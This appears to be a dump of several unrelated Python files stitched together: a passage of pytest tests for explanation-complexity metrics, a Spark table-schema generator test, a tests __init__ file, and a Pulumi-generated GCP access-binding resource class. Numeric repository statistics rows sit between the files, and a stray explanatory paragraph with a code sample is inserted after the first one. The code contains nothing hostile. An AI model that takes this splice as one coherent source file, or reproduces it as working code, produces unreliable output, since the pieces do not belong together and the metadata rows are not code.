"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"normalise": False,
"explain_func": explain,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("almost_uniform_2d_no_abatch"),
{
"normalise": False,
"explain_func": explain,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
],
)
def test_complexity(
model: ModelInterface,
data: dict,
params: dict,
expected: Union[float, dict, bool],
):
scores = Complexity(**params)(
model=model,
x_batch=data["x_batch"],
y_batch=data["y_batch"],
a_batch=data["a_batch"],
**params
)
assert scores is not None, "Test failed."
@pytest.mark.complexity
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": True,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": True,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": False,
"explain_func": explain,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("almost_uniform_2d_no_abatch"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": False,
"explain_func": explain,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
],
)
def test_effective_complexity(
model: ModelInterface,
data: dict,
params: dict,
expected: Union[float, dict, bool],
):
scores = EffectiveComplexity(**params)(
model=model,
x_batch=data["x_batch"],
y_batch=data["y_batch"],
a_batch=data["a_batch"],
        **params  # also forwarded at call time; the metric's __call__ accepts the extra kwargs
)
    assert scores is not None, "EffectiveComplexity returned no scores."
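Both tests above follow the same calling convention: the case's `params` dict is unpacked into the metric constructor and then again into the call itself. A minimal stand-in (hypothetical, not the Quantus implementation) shows why forwarding `**params` twice is harmless — the call site simply absorbs the extra keyword arguments:

```python
class Metric:
    """Hypothetical stand-in for a Quantus-style metric."""

    def __init__(self, normalise=False, disable_warnings=False,
                 display_progressbar=False, **kwargs):
        # Configuration kwargs are consumed at construction time.
        self.normalise = normalise

    def __call__(self, model=None, x_batch=None, y_batch=None,
                 a_batch=None, **kwargs):
        # Extra kwargs (including a repeated **params) are absorbed here,
        # so passing the same dict to __init__ and __call__ does not raise.
        return [0.5 for _ in a_batch]


params = {"normalise": True, "disable_warnings": True}
scores = Metric(**params)(model=None, x_batch=[1], y_batch=[0],
                          a_batch=[[0.1, 0.9]], **params)
assert scores is not None
```

If `__call__` did not declare a `**kwargs` catch-all, the second `**params` would raise a `TypeError` for each unexpected keyword.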
| 27.370558 | 75 | 0.419603 | 885 | 10,784 | 4.867797 | 0.082486 | 0.094475 | 0.118384 | 0.167131 | 0.922006 | 0.922006 | 0.914113 | 0.914113 | 0.914113 | 0.914113 | 0 | 0.026342 | 0.450853 | 10,784 | 393 | 76 | 27.440204 | 0.701114 | 0 | 0 | 0.690909 | 0 | 0 | 0.22895 | 0.028375 | 0 | 0 | 0 | 0 | 0.01039 | 1 | 0.007792 | false | 0 | 0.020779 | 0 | 0.028571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c5e31d1fa51b2136f55500dc3adf07c71b6ac004 | 6,630 | py | Python | src/datalakebundle/table/schema/tests/TableSchemaGenerator_test.py | bricksflow/datalake-bundle | 2d435a46a74915a23738482a71f240a89ab32389 | [
"MIT"
] | null | null | null | src/datalakebundle/table/schema/tests/TableSchemaGenerator_test.py | bricksflow/datalake-bundle | 2d435a46a74915a23738482a71f240a89ab32389 | [
"MIT"
] | 1 | 2021-11-04T13:01:15.000Z | 2021-11-04T13:01:15.000Z | src/datalakebundle/table/schema/TableSchemaGenerator_test.py | daipe-ai/datalake-bundle | 01bd0e2e7361561f2278fe08ee78b92beb9cda26 | [
"MIT"
] | null | null | null | import pyspark.sql.types as t

from datalakebundle.table.schema.TableSchemaGenerator import TableSchemaGenerator

schema = t.StructType(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"STRUCT1",
t.StructType(
[
t.StructField("NESTED_FIELD1", t.StringType()),
t.StructField(
"STRUCT2",
t.StructType(
[
t.StructField("NESTED_FIELD2", t.StringType()),
],
),
),
],
),
),
],
)
expected_result = """def get_schema():
return TableSchema(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"STRUCT1",
t.StructType(
[
t.StructField("NESTED_FIELD1", t.StringType()),
t.StructField(
"STRUCT2",
t.StructType(
[
t.StructField("NESTED_FIELD2", t.StringType()),
],
),
),
],
),
),
],
# primary_key="", # INSERT PRIMARY KEY(s) HERE (OPTIONAL)
# partition_by="" # INSERT PARTITION KEY(s) HERE (OPTIONAL)
# tbl_properties={} # INSERT TBLPROPERTIES HERE (OPTIONAL)
)
"""
assert TableSchemaGenerator().generate(schema) == expected_result

schema = t.StructType(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.StructType(
[
t.StructField("NESTED_ARRAY_FIELD1", t.StringType()),
t.StructField("NESTED_ARRAY_FIELD2", t.StringType()),
t.StructField("NESTED_ARRAY_FIELD3", t.ArrayType(t.StringType())),
],
),
),
),
],
)
expected_result = """def get_schema():
return TableSchema(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.StructType(
[
t.StructField("NESTED_ARRAY_FIELD1", t.StringType()),
t.StructField("NESTED_ARRAY_FIELD2", t.StringType()),
t.StructField("NESTED_ARRAY_FIELD3", t.ArrayType(t.StringType())),
],
),
),
),
],
# primary_key="", # INSERT PRIMARY KEY(s) HERE (OPTIONAL)
# partition_by="" # INSERT PARTITION KEY(s) HERE (OPTIONAL)
# tbl_properties={} # INSERT TBLPROPERTIES HERE (OPTIONAL)
)
"""
assert TableSchemaGenerator().generate(schema) == expected_result

schema = t.StructType(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.ArrayType(t.StringType()),
),
),
],
)
expected_result = """def get_schema():
return TableSchema(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.ArrayType(t.StringType()),
),
),
],
# primary_key="", # INSERT PRIMARY KEY(s) HERE (OPTIONAL)
# partition_by="" # INSERT PARTITION KEY(s) HERE (OPTIONAL)
# tbl_properties={} # INSERT TBLPROPERTIES HERE (OPTIONAL)
)
"""
assert TableSchemaGenerator().generate(schema) == expected_result

schema = t.StructType(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.ArrayType(
t.StructType(
[
t.StructField(
"VERY_BADLY_NESTED_ARRAY_OF_ARRAY_OF_ARRAY_OF_DOUBLES",
t.ArrayType(
t.ArrayType(
t.ArrayType(t.DoubleType()),
),
),
),
],
),
),
),
),
],
)
expected_result = """def get_schema():
return TableSchema(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.ArrayType(
t.StructType(
[
t.StructField(
"VERY_BADLY_NESTED_ARRAY_OF_ARRAY_OF_ARRAY_OF_DOUBLES",
t.ArrayType(
t.ArrayType(
t.ArrayType(t.DoubleType()),
),
),
),
],
),
),
),
),
],
# primary_key="", # INSERT PRIMARY KEY(s) HERE (OPTIONAL)
# partition_by="" # INSERT PARTITION KEY(s) HERE (OPTIONAL)
# tbl_properties={} # INSERT TBLPROPERTIES HERE (OPTIONAL)
)
"""
assert TableSchemaGenerator().generate(schema) == expected_result
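All four cases above exercise the same recursion: the generator walks the nested `StructType`/`ArrayType` tree and emits indented constructor calls, one level deeper per nested struct. A simplified, hypothetical sketch of that walk — using a plain tuple-based type tree instead of real pyspark types — looks like this:

```python
def render_type(tp, indent=0):
    """Render a simplified type tree as pyspark-style constructor code."""
    pad = "    " * indent
    if isinstance(tp, str):                      # leaf type, e.g. "StringType"
        return f"t.{tp}()"
    kind, inner = tp
    if kind == "array":
        # Arrays wrap their element type without increasing field indentation.
        return f"t.ArrayType({render_type(inner, indent)})"
    if kind == "struct":
        # Structs emit one StructField per child, indented one level deeper.
        fields = ",\n".join(
            f'{pad}    t.StructField("{name}", {render_type(child, indent + 1)})'
            for name, child in inner
        )
        return f"t.StructType([\n{fields},\n{pad}])"
    raise ValueError(f"unknown kind: {kind}")


tree = ("struct", [
    ("FIELD1", "IntegerType"),
    ("ARRAY1", ("array", ("array", "StringType"))),
])
code = render_type(tree)
```

Under these assumptions, `code` contains `t.ArrayType(t.ArrayType(t.StringType()))` for the doubly nested array, mirroring the third expected result above.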
| 32.985075 | 94 | 0.422775 | 465 | 6,630 | 5.903226 | 0.103226 | 0.201093 | 0.072131 | 0.134062 | 0.963934 | 0.963934 | 0.963934 | 0.963934 | 0.963934 | 0.963934 | 0 | 0.012256 | 0.458522 | 6,630 | 200 | 95 | 33.15 | 0.752368 | 0 | 0 | 0.861702 | 0 | 0 | 0.588839 | 0.095928 | 0 | 0 | 0 | 0 | 0.021277 | 1 | 0 | false | 0 | 0.010638 | 0 | 0.031915 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a8c272168120ddc95c10dfbbc52c6dc22fca1d34 | 229 | py | Python | tests/structure_prediction/__init__.py | jharrymoore/Icolos | c60cc00c34208ab7011d41d52a74651763673e7a | [
"Apache-2.0"
] | 11 | 2022-01-30T14:36:13.000Z | 2022-03-22T09:40:57.000Z | tests/structure_prediction/__init__.py | jharrymoore/Icolos | c60cc00c34208ab7011d41d52a74651763673e7a | [
"Apache-2.0"
] | 2 | 2022-03-23T07:56:49.000Z | 2022-03-24T12:01:42.000Z | tests/structure_prediction/__init__.py | jharrymoore/Icolos | c60cc00c34208ab7011d41d52a74651763673e7a | [
"Apache-2.0"
] | 8 | 2022-01-28T10:32:31.000Z | 2022-03-22T09:40:59.000Z | from tests.structure_prediction.test_peptide_embedder import *
from tests.structure_prediction.test_pdb_fixer import *
# from tests.structure_prediction.test_dssp import *
# TODO: work out why the dssp unit test hangs sometimes
| 38.166667 | 62 | 0.838428 | 33 | 229 | 5.575758 | 0.575758 | 0.146739 | 0.293478 | 0.456522 | 0.586957 | 0.413043 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10917 | 229 | 5 | 63 | 45.8 | 0.901961 | 0.454148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
767da7e298d7abe02446afacae01784464915b4f | 16,542 | py | Python | sdk/python/pulumi_gcp/accesscontextmanager/gcp_user_access_binding.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/accesscontextmanager/gcp_user_access_binding.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/accesscontextmanager/gcp_user_access_binding.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['GcpUserAccessBindingArgs', 'GcpUserAccessBinding']
@pulumi.input_type
class GcpUserAccessBindingArgs:
def __init__(__self__, *,
access_levels: pulumi.Input[str],
group_key: pulumi.Input[str],
organization_id: pulumi.Input[str]):
"""
The set of arguments for constructing a GcpUserAccessBinding resource.
:param pulumi.Input[str] access_levels: Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
:param pulumi.Input[str] group_key: Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
:param pulumi.Input[str] organization_id: Required. ID of the parent organization.
"""
pulumi.set(__self__, "access_levels", access_levels)
pulumi.set(__self__, "group_key", group_key)
pulumi.set(__self__, "organization_id", organization_id)
@property
@pulumi.getter(name="accessLevels")
def access_levels(self) -> pulumi.Input[str]:
"""
Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
"""
return pulumi.get(self, "access_levels")
@access_levels.setter
def access_levels(self, value: pulumi.Input[str]):
pulumi.set(self, "access_levels", value)
@property
@pulumi.getter(name="groupKey")
def group_key(self) -> pulumi.Input[str]:
"""
Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
"""
return pulumi.get(self, "group_key")
@group_key.setter
def group_key(self, value: pulumi.Input[str]):
pulumi.set(self, "group_key", value)
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> pulumi.Input[str]:
"""
Required. ID of the parent organization.
"""
return pulumi.get(self, "organization_id")
@organization_id.setter
def organization_id(self, value: pulumi.Input[str]):
pulumi.set(self, "organization_id", value)
@pulumi.input_type
class _GcpUserAccessBindingState:
def __init__(__self__, *,
access_levels: Optional[pulumi.Input[str]] = None,
group_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering GcpUserAccessBinding resources.
:param pulumi.Input[str] access_levels: Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
:param pulumi.Input[str] group_key: Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
:param pulumi.Input[str] name: Immutable. Assigned by the server during creation. The last segment has an arbitrary length and has only URI unreserved
characters (as defined by RFC 3986 Section 2.3). Should not be specified by the client during creation. Example:
"organizations/256/gcpUserAccessBindings/b3-BhcX_Ud5N"
:param pulumi.Input[str] organization_id: Required. ID of the parent organization.
"""
if access_levels is not None:
pulumi.set(__self__, "access_levels", access_levels)
if group_key is not None:
pulumi.set(__self__, "group_key", group_key)
if name is not None:
pulumi.set(__self__, "name", name)
if organization_id is not None:
pulumi.set(__self__, "organization_id", organization_id)
@property
@pulumi.getter(name="accessLevels")
def access_levels(self) -> Optional[pulumi.Input[str]]:
"""
Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
"""
return pulumi.get(self, "access_levels")
@access_levels.setter
def access_levels(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access_levels", value)
@property
@pulumi.getter(name="groupKey")
def group_key(self) -> Optional[pulumi.Input[str]]:
"""
Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
"""
return pulumi.get(self, "group_key")
@group_key.setter
def group_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_key", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Immutable. Assigned by the server during creation. The last segment has an arbitrary length and has only URI unreserved
characters (as defined by RFC 3986 Section 2.3). Should not be specified by the client during creation. Example:
"organizations/256/gcpUserAccessBindings/b3-BhcX_Ud5N"
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> Optional[pulumi.Input[str]]:
"""
Required. ID of the parent organization.
"""
return pulumi.get(self, "organization_id")
@organization_id.setter
def organization_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "organization_id", value)
class GcpUserAccessBinding(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_levels: Optional[pulumi.Input[str]] = None,
group_key: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Restricts access to Cloud Console and Google Cloud APIs for a set of users using Context-Aware Access.
To get more information about GcpUserAccessBinding, see:
* [API documentation](https://cloud.google.com/access-context-manager/docs/reference/rest/v1/organizations.gcpUserAccessBindings)
## Example Usage
## Import
GcpUserAccessBinding can be imported using any of these accepted formats
```sh
$ pulumi import gcp:accesscontextmanager/gcpUserAccessBinding:GcpUserAccessBinding default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_levels: Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
:param pulumi.Input[str] group_key: Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
:param pulumi.Input[str] organization_id: Required. ID of the parent organization.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GcpUserAccessBindingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Restricts access to Cloud Console and Google Cloud APIs for a set of users using Context-Aware Access.
To get more information about GcpUserAccessBinding, see:
* [API documentation](https://cloud.google.com/access-context-manager/docs/reference/rest/v1/organizations.gcpUserAccessBindings)
## Example Usage
## Import
GcpUserAccessBinding can be imported using any of these accepted formats
```sh
$ pulumi import gcp:accesscontextmanager/gcpUserAccessBinding:GcpUserAccessBinding default {{name}}
```
:param str resource_name: The name of the resource.
:param GcpUserAccessBindingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GcpUserAccessBindingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_levels: Optional[pulumi.Input[str]] = None,
group_key: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GcpUserAccessBindingArgs.__new__(GcpUserAccessBindingArgs)
if access_levels is None and not opts.urn:
raise TypeError("Missing required property 'access_levels'")
__props__.__dict__["access_levels"] = access_levels
if group_key is None and not opts.urn:
raise TypeError("Missing required property 'group_key'")
__props__.__dict__["group_key"] = group_key
if organization_id is None and not opts.urn:
raise TypeError("Missing required property 'organization_id'")
__props__.__dict__["organization_id"] = organization_id
__props__.__dict__["name"] = None
super(GcpUserAccessBinding, __self__).__init__(
'gcp:accesscontextmanager/gcpUserAccessBinding:GcpUserAccessBinding',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
access_levels: Optional[pulumi.Input[str]] = None,
group_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None) -> 'GcpUserAccessBinding':
"""
Get an existing GcpUserAccessBinding resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_levels: Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
:param pulumi.Input[str] group_key: Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
:param pulumi.Input[str] name: Immutable. Assigned by the server during creation. The last segment has an arbitrary length and has only URI unreserved
characters (as defined by RFC 3986 Section 2.3). Should not be specified by the client during creation. Example:
"organizations/256/gcpUserAccessBindings/b3-BhcX_Ud5N"
:param pulumi.Input[str] organization_id: Required. ID of the parent organization.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GcpUserAccessBindingState.__new__(_GcpUserAccessBindingState)
__props__.__dict__["access_levels"] = access_levels
__props__.__dict__["group_key"] = group_key
__props__.__dict__["name"] = name
__props__.__dict__["organization_id"] = organization_id
return GcpUserAccessBinding(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accessLevels")
def access_levels(self) -> pulumi.Output[str]:
"""
Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
"""
return pulumi.get(self, "access_levels")
@property
@pulumi.getter(name="groupKey")
def group_key(self) -> pulumi.Output[str]:
"""
Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
"""
return pulumi.get(self, "group_key")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Immutable. Assigned by the server during creation. The last segment has an arbitrary length and has only URI unreserved
characters (as defined by RFC 3986 Section 2.3). Should not be specified by the client during creation. Example:
"organizations/256/gcpUserAccessBindings/b3-BhcX_Ud5N"
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> pulumi.Output[str]:
"""
Required. ID of the parent organization.
"""
return pulumi.get(self, "organization_id")
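The generated class above routes two `@overload` signatures through a single real `__init__` that inspects its positional arguments and either unpacks a typed args object or treats the inputs as plain keyword arguments, raising for missing required properties. A stripped-down, hypothetical illustration of that dispatch pattern (not the actual Pulumi SDK internals):

```python
class BindingArgs:
    """Typed bag of required properties (illustrative stand-in)."""

    def __init__(self, access_levels, group_key, organization_id):
        self.access_levels = access_levels
        self.group_key = group_key
        self.organization_id = organization_id


class Binding:
    def __init__(self, resource_name, *args, **kwargs):
        # Overload dispatch: either a single args object or plain kwargs.
        if args and isinstance(args[0], BindingArgs):
            kwargs = dict(vars(args[0]))
        # Mirror the required-property checks of the generated _internal_init.
        if kwargs.get("access_levels") is None:
            raise TypeError("Missing required property 'access_levels'")
        self.resource_name = resource_name
        self.props = kwargs


# Both call styles resolve to the same constructor body.
b1 = Binding("b1", BindingArgs("accessPolicies/9522/accessLevels/x",
                               "01d520gv4vjcrht", "256"))
b2 = Binding("b2", access_levels="accessPolicies/9522/accessLevels/x",
             group_key="01d520gv4vjcrht", organization_id="256")
```

The real SDK performs the same branching via `_utilities.get_resource_args_opts`, which decides whether the positional argument is the typed args class before falling back to keyword arguments.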
| 53.533981 | 387 | 0.688429 | 2,035 | 16,542 | 5.427027 | 0.114496 | 0.048805 | 0.05958 | 0.043825 | 0.826512 | 0.802608 | 0.777345 | 0.760413 | 0.749457 | 0.734969 | 0 | 0.009152 | 0.227179 | 16,542 | 308 | 388 | 53.707792 | 0.85474 | 0.484887 | 0 | 0.530488 | 1 | 0 | 0.11154 | 0.011579 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152439 | false | 0.006098 | 0.030488 | 0 | 0.27439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |